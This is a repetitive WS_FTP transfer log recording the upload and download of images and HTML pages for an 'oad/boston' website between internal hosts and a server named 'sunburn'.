10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
